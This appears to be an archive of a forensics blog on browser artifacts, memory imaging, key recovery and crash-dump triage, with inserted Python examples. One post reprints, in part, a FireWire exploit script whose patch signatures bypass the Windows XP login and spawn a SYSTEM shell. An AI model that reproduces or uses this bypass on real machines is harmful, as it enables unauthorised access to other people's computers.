Computer Forensics and Incident Response

Updated: 2018-03-05T16:59:08.813+00:00


Unpack Javascript


I haven't mentioned my disdain for all things Java. There it is.

Tool to list windows protected files


Not tested, but interesting nevertheless: SFCList by Nagareshwar Talekar

From his blog post: After I wrote about ‘Detecting System DLL’ some of my friends working on malware analysis asked for any tool which can show if the particular file is protected by SFC mechanism. I could not find any such tool and decided to write my own tool. . .



I was doing a vanity search today on this page and found that my post "Defeating" whole disk encryption was cited in:

Christopher Hargreaves and Howard Chivers, "Recovery of Encryption Keys from Memory Using a Linear Scan," in Proceedings of the Third International Conference on Availability, Reliability and Security (ARES 2008), pp. 1369-1376, 2008.

I haven't read the article, but the abstract sounds enticing:

As encrypted containers are encountered more frequently the need for live imaging is likely to increase. However, an acquired live image of an open encrypted file system cannot later be verified against any original evidence, since when the power is removed the decrypted contents are no longer accessible. This paper shows that if a memory image is also obtained at the same time as the live container image, by the design of on-the-fly encryption, decryption keys can be recovered from the memory dump. These keys can then be used offline to gain access to the encrypted container file, facilitating standard, repeatable, forensic file system analysis. The recovery method uses a linear scan of memory to generate trial keys from all possible memory positions to decrypt the container. The effectiveness of this approach is demonstrated by recovering TrueCrypt decryption keys from a memory dump of a Windows XP system.

Academic respectability. Woot!
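The linear-scan recovery the abstract describes, as an added example (not from the paper or from this blog): the paper recovered AES keys for TrueCrypt volumes; so that this runs with only the Python standard library, a SHA-256 counter-mode keystream stands in for the cipher, and the container header, the "memory dump" and the key offset are all constructed. The scan logic is the part that carries over: every offset of the dump is a trial key, and a trial is accepted when it decrypts the first block of the container to the known header.

```python
import hashlib
import random

KEY_LEN = 32                      # same size as an AES-256 key
BLOCK = 16
MAGIC = b"CONTAINER-HDR-v1"       # constructed 16-byte plaintext header of the "container"


def keystream(key, nblocks):
    """Stand-in cipher (NOT AES, NOT TrueCrypt): 16 bytes of SHA-256(key || counter)
    per block. It only exists so the scan runs with the standard library."""
    return b"".join(hashlib.sha256(key + i.to_bytes(8, "little")).digest()[:BLOCK]
                    for i in range(nblocks))


def crypt(key, data):
    """XOR data with the keystream; encrypt and decrypt are the same operation."""
    ks = keystream(key, (len(data) + BLOCK - 1) // BLOCK)
    return bytes(a ^ b for a, b in zip(data, ks))


def make_scenario(seed=7):
    """Constructed evidence: an encrypted container and a 'memory dump' that holds
    the key at an unknown offset. The true offset is returned so a test can check it."""
    rng = random.Random(seed)
    rnd = lambda n: bytes(rng.getrandbits(8) for _ in range(n))
    key = rnd(KEY_LEN)
    plaintext = MAGIC + rnd(240)
    before, after = rnd(6000), rnd(6000)
    return {"dump": before + key + after, "container": crypt(key, plaintext),
            "plaintext": plaintext, "key_offset": len(before)}


def scan_for_key(dump, container, step=1):
    """Linear scan: every offset (every `step` bytes) of the dump is a trial key.
    A trial is accepted when it decrypts the container's first block to the known
    header; with a 16-byte header a false positive is ~2**-128 per trial."""
    head = container[:BLOCK]
    for off in range(0, len(dump) - KEY_LEN + 1, step):
        trial = dump[off:off + KEY_LEN]
        if crypt(trial, head) == MAGIC:
            return off, trial
    return None


if __name__ == "__main__":
    s = make_scenario()
    hit = scan_for_key(s["dump"], s["container"])
    print("key at dump offset:", None if hit is None else hit[0])
```

Against a real dump and a real volume you would swap crypt() for the volume's actual cipher and mode and the header check for that format's magic or checksum; a step of 4 or 16 bytes cuts the trial count but misses a key that happens to sit at an unaligned offset.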

Tubes Clogged, Internets are Broken


The Internets are broken!

Set your system date to August 2004 before visiting the site.


More here and here.

Alexander Sotirov et al. did some really interesting research on creating a rogue CA certificate by way of an MD5 chosen-prefix collision, computed on a cluster of about 200 PlayStation 3 consoles - Fear!

More fun with Chrome


The Sunbelt Blog has a link here that will force Chrome to crash.

Or you can enter crash:% into your browser and do it yourself.

Good times.

Google's Chrome Browsing History, a first pass


This will be a short post. I'm sleep deprived and traveling. . .

Google Chrome debuted yesterday. So sometime this week, someone somewhere will have to do some analysis on Chrome's browser artifacts. Until someone writes a script/program to extract user history, here's one way to get some information:

Chrome saves its data files in C:\Documents and Settings\[user]\Local Settings\Application Data\Google\Chrome\User Data\Default

The following files are SQLite format 3 databases:
History
Archived History
Web Data

To examine the data stored in SQLite format 3, you can run strings against the files, or open them in a SQLite viewer. I found sqlite3explorer here. It does a fairly decent job of rendering the data.*

If we open the "History" file and go to main > tables > urls, right click on urls and click "show data", the bottom right window will populate with the data in the urls table.

It is important to note that Chrome will import browsing history from other web browsers, so the history contained here may not have been generated by Chrome.

Running strings against the following files may reveal interesting data:
Last Session
Current Session

Visited Links has binary data. YMMV.

* This doesn't work well on my computer unless executed by double clicking on the icon from the firefox download tab:


There are also files called:
History Index 2008-09
History Index 2008-08
(Judging by the names, these appear to be created monthly, but this needs to be confirmed.)
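A first pass at the same data in code, as an added example rather than anything from the original post: it opens the History database with Python's sqlite3, joins visits to urls, and converts Chrome's timestamps (microseconds since 1601-01-01 UTC, the Windows FILETIME epoch counted in microseconds) to readable UTC times, which strings and a table viewer won't give you. The urls and visits column names are Chrome's own; the rows inserted into the in-memory database are constructed sample data, and the transition table covers only the core page-transition types.

```python
import sqlite3
from datetime import datetime, timedelta, timezone

# Chrome stores times as microseconds since 1601-01-01 UTC (the Windows FILETIME
# epoch, but in microseconds rather than 100 ns ticks).
CHROME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

# Core page-transition types, kept in the low 8 bits of visits.transition.
TRANSITION_CORE = {0: "link", 1: "typed", 2: "auto_bookmark", 3: "auto_subframe",
                   4: "manual_subframe", 5: "generated", 6: "start_page",
                   7: "form_submit", 8: "reload", 9: "keyword", 10: "keyword_generated"}


def chrome_to_datetime(us):
    """Chrome timestamp -> aware UTC datetime (None for the 0 Chrome writes for 'never')."""
    return None if not us else CHROME_EPOCH + timedelta(microseconds=us)


def datetime_to_chrome(dt):
    """Inverse of chrome_to_datetime; handy for building test data and time filters."""
    return (dt - CHROME_EPOCH) // timedelta(microseconds=1)


def list_visits(conn):
    """One tuple per visit, oldest first: (UTC time, url, title, transition type)."""
    rows = conn.execute("""
        SELECT v.visit_time, u.url, u.title, v.transition
        FROM visits v JOIN urls u ON u.id = v.url
        ORDER BY v.visit_time""").fetchall()
    return [(chrome_to_datetime(t).isoformat(), url, title,
             TRANSITION_CORE.get(tr & 0xFF, "unknown")) for t, url, title, tr in rows]


def open_history(path):
    """Open a (copied) History file read-only; Chrome locks the live one."""
    return sqlite3.connect(f"file:{path}?mode=ro", uri=True)


def build_sample_history(conn):
    """Constructed sample rows in the shape of Chrome's 'urls' and 'visits' tables
    (only the columns this script reads are meaningful)."""
    conn.executescript("""
        CREATE TABLE urls(id INTEGER PRIMARY KEY, url TEXT, title TEXT,
                          visit_count INTEGER, typed_count INTEGER,
                          last_visit_time INTEGER, hidden INTEGER);
        CREATE TABLE visits(id INTEGER PRIMARY KEY, url INTEGER,
                            visit_time INTEGER, from_visit INTEGER,
                            transition INTEGER);""")
    t0 = datetime_to_chrome(datetime(2008, 9, 3, 12, 0, tzinfo=timezone.utc))
    conn.executemany("INSERT INTO urls VALUES (?,?,?,?,?,?,?)", [
        (1, "http://www.google.com/", "Google", 2, 1, t0 + 60_000_000, 0),
        (2, "http://example.invalid/login", "Login", 1, 0, t0 + 5_000_000, 0)])
    conn.executemany("INSERT INTO visits VALUES (?,?,?,?,?)", [
        (1, 1, t0, 0, 0x10000001),                 # typed into the address bar
        (2, 2, t0 + 5_000_000, 1, 0x00000000),     # reached by a link from visit 1
        (3, 1, t0 + 60_000_000, 0, 0x00000008)])   # reload
    conn.commit()


def demo():
    """Build the sample database in memory and return its visit list."""
    conn = sqlite3.connect(":memory:")
    build_sample_history(conn)
    return list_visits(conn)


if __name__ == "__main__":
    for row in demo():
        print(*row, sep="\t")
```

Work on a copy of the History file, since Chrome holds it open while running, and open even the copy read-only. The typed versus link distinction is worth keeping in the output: it separates URLs the user entered deliberately from pages they were sent to.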

Pre-boot authentication bypass techniques.


Jonathan Brossard gave a talk at DefCon 16 ("Bypassing pre-boot authentication passwords by instrumenting the BIOS keyboard buffer") that has not gotten much press, but his research has some interesting forensic implications: the password typed at pre-boot can remain in the BIOS keyboard buffer, in low physical memory, after the operating system is up, so it may turn up in a memory image. The white paper, and a tool set, are available from his site.

/dev/mem for Windows, and other bits of memory goodness.


Can "good old cygwin dd" and dcfldd access \Device\PhysicalMemory? It appears that they can.

I was reading posts by Harlan Carvey and Andreas Schuster about new tools for imaging physical memory in Windows this week. Some interesting stuff there. Then I stumbled across an article in Forensic Magazine by Kevin Mandia and Kris Harms, which said in part that \Device\PhysicalMemory could be imaged with dcfldd. I tried the string in the article:

DCFLDD if=\\.\PhysicalMemory of=AnyExternalDevice conv=sync,noerror

and I got a big handful of fail for my efforts.

I assumed that someone else had tried this, and a little googling turned up this string at Forensic Focus, as well as a post on the Windows Incident Response blog that mentioned it (how did I miss that post, and why can't I find it now?).

I used the /dev/mem substitution for dcfldd on an XP SP2 box and it seemed to work.

So what I'd learned so far:

1. The Mandia article has incorrect syntax.
2. You can use dcfldd to image something from /dev/mem.

It didn't seem like anyone had figured out what dcfldd was imaging though.

My next thought was, "If dcfldd can image the mysterious /dev/mem, can good old cygwin dd access it too?" It appears that it can.

According to these posts on the cygwin developers' list, cygwin backs /dev/mem with the \Device\PhysicalMemory section object, in a manner consistent with *nix systems. (Worth knowing before you rely on it: starting with Windows Server 2003 SP1, and so also in Vista, Microsoft blocks user-mode access to \Device\PhysicalMemory, which limits this route to XP-era systems.)

I decided to conduct a quick experiment with each. I acquired a sample of physical memory from an XP Pro SP2 box with four tools:

06/20/2008 09:21 AM 1,064,648,704 dd.img
06/20/2008 09:17 AM 1,064,685,568 win32.dump
06/27/2008 11:49 AM 1,064,685,568 mdd.img
06/20/2008 09:09 AM 1,064,697,856 dcfldd.img

The same command was used for both dcfldd and dd: (dcfl)dd if=/dev/mem of=.\outfile.img conv=sync,noerror

Nothing earth shattering here, but note the file sizes.

P2P Marshal


While researching something unrelated, I tripped across P2P Marshal. Since I have not been able to get to any sort of training short of paying my own way, I did not make it to DFRWS 2007; at any rate, the tool's been out and it's free to LE.

From the website:

P2P Marshal is a tool to analyze peer-to-peer (P2P) usage on file system images. It automatically detects what P2P client programs are, or were, present, extracts configuration and log information, and shows the investigator the shared (uploaded and downloaded) files.

P2P Marshal follows forensic best practices and maintains a detailed log file of all activities it performs. It is designed to be easily extensible to support new P2P clients and networks. It has extensive search capabilities, produces reports in RTF, PDF, and HTML formats and runs on Windows-based operating systems.

* Analyzes peer-to-peer network usage
* NIJ-sponsored project
* Extensible
* Forensically sound
* Version 1.0 available free to law enforcement
* Provides full analysis for: BitTorrent, LimeWire, uTorrent, and Azureus
* Detects and shows default download locations for Ares, Google Hello, and Kazaa
* Future versions will include additional client support and capabilities


System requirements:
* Microsoft Windows XP or Vista Operating System
* 120 MB disk space free

I don't think I'll have the time to use this any time soon, but if someone else does, I would be interested to know about it.

There's also a mention in the ForensicsWiki about it.

Note to marketing: If you want to sell to cops. . .


don't use toy handcuffs in your marketing.

Talk about "push-button forensics" marketing.

Not impressive. I'd also note that the vendor claimed to have ~900 phones that it could image, but their website showed a little over 410. Hmmm.

Vista may be vulnerable to a local password bypass via firewire.


Vista vulnerable to firewire hack (via Thoughts of a Technocrat)

I've been too busy to play with these attacks, but it's on my to-do list.

Digging Deeper during analysis


This post has been on my mind for some time (I'm cleaning up draft posts), but it does not look like I am going to get to it any time soon. So this is going to be quick and dirty.

I was doing forensics on an intrusion last year, and I knew the following:

The computer was compromised and talking to the outside world via DNS.

I had a DD image of the RAM, and dumps of process memory from each of the processes (as well as a lot of other volatile data).

Unfortunately, I did not have any way to know which (or if any) of the processes were the bad guy's, so my process of elimination went like this:

1. Look at the process list.
2. Find associated executables.
3. Look at executable files.

Unfortunately, this server was running a lot of "stuff," so I was still left with a lot of files to look at, but after much work, I found a file that looked weird enough to make me think that it was likely the bad process. (Oh, and I should point out that there were no logs, and the intrusion, we later determined, was months old.)

So how does one go about figuring out what happened when there's a lack of log data? Well, it turns out that when I sorted the files by date created, I found a memory.dmp file.

So I spent a bit of time researching the memory dump file format, and I was able to find the file that the attacker used (it caused some nastiness at the time it was executed), which in turn led me to other information about the attack in unallocated space.

This was kind of long, but if you aren't looking beyond what you can see in the file system, you are missing a lot of good information.

Black Bag pwnies


I've blogged before about Adam (Metlstorm) Boileau's Python script that can be used to extract BIOS/PGP passwords. This week, he released the script he designed that lets a Linux box, over FireWire, patch the Windows logon password check in memory so that any password is accepted. . . cool stuff if you have physical access to a box. I have not tested this yet, but it looks good. . . Now I know what I'll be playing with at work tomorrow.

Preemptive comments: "But you're changing the evidence." "But you're modifying the RAM." "But you've got physical access to the box, you could _______." "But if someone doesn't have XP SP2 you are out of luck." "Nobody's done this on Vista."

The code's below because his blog has been slashdotted. Blogger left justifies everything, so you are going to have to fix the spacing if you use the code below.

#!/usr/bin/python
# Windows locked screen remote firewire unlockor
# Metlstorm 2k6
# Uh, private use only, not for public distro, kthx.
import sys
import firewire
import binascii
import time

VER=1.5
VERSTR="Winlockpwn v%s Metlstorm, 2k6. " % VER

# Targets are dicts, with some properties, and one or more phases
# each phase specifies a signature which can be found at one or more
# page offsets. When a signature is found the patch is applied at patchoffset
# bytes from the beginning of the signature.
targets=[
  { "name":"WinXP SP2 Fast User Switching Unlock",
    "notes":"When run against a locked XPSP2 box with FUS on, it will cause all passwords to succeed. You'll still get the password-is-wrong dialog, but then you'll get logged in anyway.",
    "phase":[{ "sig":"8BD8F7DB1ADBFEC3", "pageoffset":[2905], "patch":"bb01000000eb0990", "patchoffset":0}] },
  { "name":"WinXP SP2 Unlock",
    "notes":"When run against a locked XPSP2 box with regular non-fast-user-switching, it will cause all passwords to succeed. You'll still get the password-is-wrong dialog, but then you'll get logged in anyway.",
    "phase":[{ "sig":"0502000010", "pageoffset":[3696], "patch":"b801000000", "patchoffset":0}] },
  { "name":"WinXP SP2 msv1_0.dll technique",
    "notes":"Patches the call which decides if an account requires password authentication. This will cause all accounts to no longer require a password, which covers logging in, locking, and probably network authentication too! This is the best allround XPSP2 technique.",
    "phase":[{ "sig":"8BFF558BEC83EC50A1", "pageoffset":[0x927], "patch":"B001", "patchoffset":0xa5}] },
  { "name":"WinXP SP2 utilman cmd spawn",
    "notes":"At the winlogon winstation (locked or prelogin), will spawn a system cmd shell. Start util manager with Win-U, and make sure all the disability-tools are stopped (narrator starts by default). Then run this, wait till it's patched a couple of data-phase things, then start narrator. Enjoy a shell. You can use this with the msv1_0.dll technique as well, and log in. Any time you want to get back to your shell, just lock the desktop, and you'll go back to the winlogon winstation where your shell will be waiting.",
    "phase":[
      { "name":"Patch code",
        "sig":"535689bde8faffffff158810185b898540fbffff39bd40fbffff744e8b8524fb",
        "pageoffset":[0x39f],
        "patch":"565383c310899de8faffffff158810185b898540fbffff9090909090",
        "patchoffset":0x0},
      { "name":"Patch data",
        "sig":"2f0055004d000000d420185b0539185b0000000053006f006600740077006100",
        "pageoffset":[0x9ac, 0x5ac, 0x3ac],
        "patch":"63006d0064002e006500780065000000570069006e0053007400610030005c00570069006e006c006f0067006f006e0000",
        "patchoffset":0x0,
        "keepgoing":True, } ] } ]

start = 0x8000000L
end = 0xffffffffL
chunk = 4096

print VERSTR

def printTargets(targets):
  i = 1
  p[...]

Two ways to get around passwords - Windows


Lance Mueller has a really good post on ways to log on to a Windows box without a password:

I discovered two additional ways to get around passwords when the passwords are either too difficult for rainbow tables or when there is only a LM password and a brute-force attack will take too long. The techniques I am going to describe will not recover the password. It will merely let you login to the system with a specific user account. Getting access to the system using these techniques will not let you access any files that are protected via EFS in Windows XP or Vista since the password is used as part of the encryption/decryption process.

Lance's blog can be found here.

Interesting tool - pdump.exe


Toni has a new tool with some interesting functionality: it dumps process memory, but it also saves each allocated memory region to a separate file.

I've played with it a little bit and it seems like it has potential.

You can read the post and download the file here.

Blog, not dead


I have had some personal issues that have been intruding on my blog time. Namely, I'm moving across the country. A couple of years ago, an agency that I don't work for started recruiting me; their recruiting ploy: going back home and doing the same job. Devious.

Long story short, I got an offer from said agency, told my present employer about the job and my agency offered to transfer me. I accepted.

The end result is I've been spending a lot of time arranging for the move. . .

Now a few random thoughts:

1. I was really saddened that Harlan Carvey decided to do away with the WindowsForensicAnalysis group on Yahoo!. I've thought about re-starting the group, but then I'm not sure that I have the time to do the moderation.

2. I do a lot of work with drives that have been encrypted with Pointsec. I've played around with the idea of breaking the encryption, and have done some initial research into the matter. Is there anyone out there who has looked into this, or is interested in collaboration? If you have/are, email me at bill (random gunk here @ .. wsxcvhuio) r i n g 3 . n e t.

3. The US Gov's idea of having 50 points that connect to the Internet is a good concept, but I'm close to reaching the conclusion that the defense of USG's national assets is best left to the Department of Defense (they're the only ones who seem to do an even half-assed job of protecting their infrastructure). Further, do we really want 50 points that are FOIA'able for all to know about? Do Americans really want everyone to know that the FBI/NSA/CIA is crawling their site? There are some who argue that this is not necessarily going to be the effect of this memo, but remember, bureaucrats will strictly follow "the letter of the law." The upside is, of course, that if this is properly implemented, the Gov's security will be better. I'm skeptical that this will be the case, however.

4. A holiday spent away from your family is not a good holiday.

Comment spam =+ moderation


It has been a busy couple of months... more to come soon.

In keeping with the Internet security theme


This was originally posted elsewhere. It's a really good graphic presentation on web-application problems.



The final solution


Internet Security:


With apologies to

A couple of thoughts and things to come


1. If you have not seen the Tactical Exploitation presentation that HD Moore and Valsmith gave at Defcon this year, you need to see it.

There's good stuff there for forensic folks too. Things that some people don't know about. . . just good stuff.


2. When you do forensics on compromised systems, there is an inverse relationship between time and evidence; that is, the greater the time between compromise and examination, the less evidence remains.

A couple of files that I've found to be useful in exams: memory.dmp and drwtsn32.log (the Dr. Watson log). I'm going to do a longer post on this later on, but in short, attackers' tools often cause applications, or the system itself, to crash, and the crash dump records what was running at that moment. This is an easy way to find out how the attack was accomplished. WinDbg is your friend here. More later.

3. I'll be posting a couple of scripts in the near future. One will extract event logs from a remote computer, and the other gets services from a remote computer (similar to sc \\remote query), but it also extracts the PID, the path to the executable, and the command line.
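A quick triage of a memory.dmp header, as an added example for point 2 and for the "Digging Deeper" post above (not the author's tool, nor anyone's): the Windows crash-dump header is one 4 KiB page, starts with "PAGEDUMP" on 32-bit systems, and carries the bug-check code and its parameters, the physical memory runs, the dump type and the crash time, so you can read the what-and-when before loading the dump into WinDbg. Field offsets follow the public 32-bit DUMP_HEADER layout; the header parsed here is constructed with XP-like values, and 64-bit "PAGEDU64" dumps are rejected rather than mis-read.

```python
import struct
from datetime import datetime, timedelta, timezone

HEADER_SIZE = 0x1000                       # the 32-bit dump header is one 4 KiB page
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
DUMP_TYPES = {1: "full", 2: "kernel"}
BUILD_TYPES = {0xF: "free", 0xC: "checked"}
BUGCHECKS = {0x0A: "IRQL_NOT_LESS_OR_EQUAL", 0x50: "PAGE_FAULT_IN_NONPAGED_AREA",
             0x7E: "SYSTEM_THREAD_EXCEPTION_NOT_HANDLED", 0xC2: "BAD_POOL_CALLER",
             0x1000008E: "KERNEL_MODE_EXCEPTION_NOT_HANDLED_M"}


def filetime_to_datetime(ft):
    """FILETIME (100 ns ticks since 1601-01-01 UTC) -> aware UTC datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt):
    return ((dt - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10


def parse_dump_header(buf):
    """Parse the fixed fields of a 32-bit Windows crash dump header."""
    if len(buf) < HEADER_SIZE:
        raise ValueError("need the full 4 KiB header")
    sig = bytes(buf[:8])
    if sig == b"PAGEDU64":
        raise ValueError("64-bit dump: different header layout, not handled here")
    if sig != b"PAGEDUMP":
        raise ValueError("not a Windows crash dump (no PAGEDUMP signature)")
    major, build = struct.unpack_from("<II", buf, 0x08)      # 0xF = free build, 0xC = checked
    machine, ncpu = struct.unpack_from("<II", buf, 0x20)
    code = struct.unpack_from("<I", buf, 0x28)[0]
    params = struct.unpack_from("<4I", buf, 0x2C)
    nruns, npages = struct.unpack_from("<II", buf, 0x64)     # _PHYSICAL_MEMORY_DESCRIPTOR
    runs = [struct.unpack_from("<II", buf, 0x6C + 8 * i) for i in range(min(nruns, 32))]
    dump_type = struct.unpack_from("<I", buf, 0xF88)[0]
    systime = struct.unpack_from("<Q", buf, 0xFC0)[0]
    return {
        "build": build,
        "build_type": BUILD_TYPES.get(major, hex(major)),
        "machine": {0x14C: "x86"}.get(machine, hex(machine)),
        "processors": ncpu,
        "bugcheck_code": hex(code),
        "bugcheck": BUGCHECKS.get(code, "unknown"),
        "parameters": [hex(p) for p in params],
        "dump_type": DUMP_TYPES.get(dump_type, f"type {dump_type}"),
        "physical_pages": npages,
        "runs": [(base * 0x1000, count * 0x1000) for base, count in runs],  # (start, length) bytes
        "crash_time": filetime_to_datetime(systime).isoformat() if systime else None,
    }


def parse_dump_file(path):
    with open(path, "rb") as f:
        return parse_dump_header(f.read(HEADER_SIZE))


def constructed_header():
    """A header with XP-like values, built for this example (not from a real dump)."""
    buf = bytearray(b"PAGE" * (HEADER_SIZE // 4))            # real dumps pad unused space with 'PAGE'
    buf[0:8] = b"PAGEDUMP"
    struct.pack_into("<II", buf, 0x08, 0xF, 2600)           # free build of kernel build 2600 (XP)
    struct.pack_into("<II", buf, 0x20, 0x14C, 1)
    struct.pack_into("<I", buf, 0x28, 0x1000008E)
    struct.pack_into("<4I", buf, 0x2C, 0xC0000005, 0x805ABCDE, 0xF7A1B0C4, 0)
    struct.pack_into("<II", buf, 0x64, 1, 0x3F000)          # one run of 0x3F000 pages (~1 GiB)
    struct.pack_into("<II", buf, 0x6C, 0, 0x3F000)
    struct.pack_into("<I", buf, 0xF88, 1)                   # full dump
    crash = datetime(2008, 6, 20, 9, 0, tzinfo=timezone.utc)
    struct.pack_into("<Q", buf, 0xFC0, datetime_to_filetime(crash))
    return bytes(buf)


if __name__ == "__main__":
    for k, v in parse_dump_header(constructed_header()).items():
        print(f"{k:15} {v}")
```

The crash time and the bug-check parameters (the first one here is an access-violation status) are what you line up against file timestamps when there are no logs; the memory runs tell you how much of physical memory the dump actually holds.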

I've been *really* busy in the last couple of months, between work and home life, but I'll continue to post when I've got something that I think is useful.

Things that pain me


It's been a really busy couple of months, so I haven't had much time to myself, but a couple of quick thoughts:

1. Five minutes a week isn't asking that much, is it?

I have a server that I manage. I've been putting in extra hours at work, but I still somehow manage to find five minutes a week to look at my logs. I wrote a shell script that looks for things like failed logins, brute force attacks, successful logins, etcetera; why can't IT "Professionals" spend a little time doing the same thing?

I'd challenge everyone to stop right here and take a look at the logs on the box that you are viewing this post from, or even better, a server that you manage. You'll learn more from five minutes of reading your own logs than you will from the rest of this blog.

2. Information security/assurance/warfare/technology/badgers are stupid

Until artificial intelligence (AI) gets significantly better (read: not during the course of your career), there will be no substitute for people doing the work of analyzing the products that computers create. There is, and there will be, no appliance, no snort box, no grep expression, no program, no pretty graphical user interface that can analyze the data collected and conclude with a reasonable degree of certainty that something is amiss. People, on the other hand, can infer, and from those inferences determine the likely answer to questions. Attackers are people, and as such are remarkably fluid and resilient in the face of adversity; that is, they can modify their behavior when confronted with new information or situations. Computers, by contrast, are rule based: if text == Attack! then drop packet. But if text == 0x41ttack, well. . .

This is not to say that computers do not do some things better than people. Data can be sorted and noise eliminated more quickly with them, but people have to analyze the data. It's a waste of time to have IDS analysts unless you have an IDS, and it is a waste of time to have an IDS without an analyst.

3. Network engineers should consider layer 8 during design, and plan their security accordingly.

People are distracted, stupid, ignorant or indifferent to policy. Policy can prohibit me from visiting a site, but someone won't get the word, or won't care if they do. Policy without enforcement is a waste of time.

The only way to secure a network is to build in security as the primary consideration. Some people have come to view their ability to access the Internet as some inalienable right on par with the 4th Amendment to the Constitution*, and IT workers seem to have become the customer service representatives for said access. It's a sad state of affairs. If your network policy is not governed by a deny all, permit by exception principle, you are owned. Maybe not today, but you will be owned. If you have a DAPBE rule set in place for your network environment, you'll still get owned, but it will be easier to clean up.

People don't need to have access to webmail, CNN, ESPN, Homestarrunner or XKCD from work. They want it, sure, and maybe some do need CNN, but who can tell me of a blacklist that will prevent users from going to all of, say, the malware sites that are hosted by Blogger? I'm guessing that there isn't one.

4. When you say, "We need to educate the users," I want you to stop breathing my air.

User education is valuable, but only when it's actually education. Education is not the bi-annual "click here to click through" security training. You are wasting your money (ok, granted, t[...]
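The sort of five-minute log check described in point 1, as an added example (not the author's shell script): it reads sshd lines in the shape of a Linux auth.log, counts failed logins per source, flags sources at or over a threshold, and pulls out the finding a person should read first, a successful login from a source that had just failed repeatedly. The log lines are constructed; in keeping with point 2, the script only sorts and filters, and the analyst still decides.

```python
import re
from collections import Counter, defaultdict

# Constructed sample lines in the shape of Linux sshd entries in /var/log/auth.log.
SAMPLE_LOG = """\
Jun 20 09:01:02 web1 sshd[4120]: Failed password for invalid user admin from 203.0.113.7 port 51200 ssh2
Jun 20 09:01:03 web1 sshd[4120]: Failed password for invalid user oracle from 203.0.113.7 port 51201 ssh2
Jun 20 09:01:05 web1 sshd[4122]: Failed password for root from 203.0.113.7 port 51202 ssh2
Jun 20 09:01:07 web1 sshd[4123]: Failed password for root from 203.0.113.7 port 51203 ssh2
Jun 20 09:01:09 web1 sshd[4124]: Failed password for root from 203.0.113.7 port 51204 ssh2
Jun 20 09:01:20 web1 sshd[4125]: Accepted password for root from 203.0.113.7 port 51205 ssh2
Jun 20 09:15:44 web1 sshd[4301]: Accepted publickey for bill from 198.51.100.23 port 40012 ssh2
Jun 20 09:16:10 web1 sshd[4305]: Failed password for bill from 198.51.100.23 port 40013 ssh2
Jun 20 09:16:15 web1 sshd[4306]: Accepted password for bill from 198.51.100.23 port 40014 ssh2
Jun 20 09:17:00 web1 CRON[4310]: pam_unix(cron:session): session opened for user root by (uid=0)
"""

LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+")


def parse(lines):
    """Yield one dict per sshd auth line; everything else (cron, sudo, ...) is skipped."""
    for line in lines:
        m = LINE.match(line)
        if m:
            yield m.groupdict()


def triage(log_text, threshold=5):
    """Summarize sshd activity: failures per source, sources at or over `threshold`
    failures, and the finding to read first - a successful login from a source
    that had already failed `threshold` or more times (a brute force that worked)."""
    failures = Counter()
    users_tried = defaultdict(set)
    successes = 0
    brute_then_success = []
    for ev in parse(log_text.splitlines()):
        if ev["result"] == "Failed":
            failures[ev["ip"]] += 1
            users_tried[ev["ip"]].add(ev["user"])
            continue
        successes += 1
        if failures[ev["ip"]] >= threshold:
            brute_then_success.append({
                "time": ev["ts"], "ip": ev["ip"], "user": ev["user"], "method": ev["method"],
                "failures_before": failures[ev["ip"]],
                "users_tried": sorted(users_tried[ev["ip"]])})
    return {
        "failures_by_source": dict(failures),
        "brute_force_sources": {ip: n for ip, n in failures.items() if n >= threshold},
        "successful_logins": successes,
        "brute_force_then_success": brute_then_success,
    }


if __name__ == "__main__":
    report = triage(SAMPLE_LOG)
    for finding in report["brute_force_then_success"]:
        print("REVIEW FIRST:", finding)
    print("brute-force sources:", report["brute_force_sources"])
```

Feed it the real file with triage(open("/var/log/auth.log").read()); the threshold is a knob for your environment, and a single typo by a legitimate user (the second source above) should not trip it.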

Order on contents of RAM upheld


I previously wrote about a California Magistrate's decision that the contents of RAM are discoverable. It seems that the order withstood appeal to the District Court. The full decision is here.


I am the CEO of Fantasy Land


There's been a dearth of posts of late due to the latest addition to the household - the 9 pound, 10 ounce kind, that is. . . Between Kid v2.0 and l337 h4x04s, I haven't had much time to post, but rynhere breezed by with a few comments. I've edited them for brevity's sake, but since he keeps coming back for the answer, I figured I'd turn this into a post (being the CEO of Fantasy Land does have its privileges).

rynhere: "Why would anyone. . . [grab a password from memory] from a running and logged in computer?"

Bill: Well, I thought it was kind of obvious, but I've found it useful to have passwords ;-).

rynhere: Um, I'm sorry, but [PGP ensures] that lost laptops (which are presumably turned off) do not pose a threat, as the data is encrypted.

Bill: I agree that PGP does mitigate the risk of data loss, but that was not the point.

rynhere: Is this "defeat" intended to describe how you would take a turned off laptop and defeat the password?

Bill: No.

rynhere: I didn't see any mention of it beyond the obvious of brute force. . . good luck on that.

Bill: Actually, there are several products out there that will do just that. AccessData's PRTK and DNA come to mind.

rynhere: However, if you have a running computer that has been logged in and is in the Windows interface, then let me give you the 1 step method of getting a copy of the data to run forensics against all day long. It's called hooking up a USB drive and downloading the meaningful contents of the native drive.

Bill: Leet!

rynhere: If you're trying to obtain forensic information from the box however, as this article seems to illustrate, I'd like to understand how it is that you ask (in your kindest, big-brother-is-watching sort of way) for this person to log into WDE and the network for you so that you can take their computer for the next 30 minutes to reverse engineer this password. Riiiight. Tell you what, if you can get someone to give you a logged in and running computer, then one of two things is the case: 1. You're the CEO of Fantasy Land. 2. You're in the wrong profession, because you can clearly sell water to a drowning man. Go find your calling in life as a salesperson instead of geeking out on reverse engineering passwords to a running, unencrypted (once you've authenticated to WDE, the drive "appears" as unencrypted) box.

Ok, now to the point. If you are going to image memory over the network, there are a number of ways to get the memory. If you have administrative rights on the box, you can use psexec to get a command prompt on the target's computer, then "net use" back to a drive under your control to execute the tools, working as the administrator on your target's box. There is no "pretty" way to do a live acquisition; you are going to make some changes no matter what method you choose, but it's nice to have more than one tool in your toolbox.

Oh, and I have asked for and received a number of passwords to computers, and I didn't even need to give the users chocolate to get them. You just never know until you ask. . .

That's all your CEO has time for right now. . . [...]

You just got 0wned. Now what?


Imagine that you are arriving at your office and you look through the window. Inside the building you can see someone burglarizing the building. What would you do?

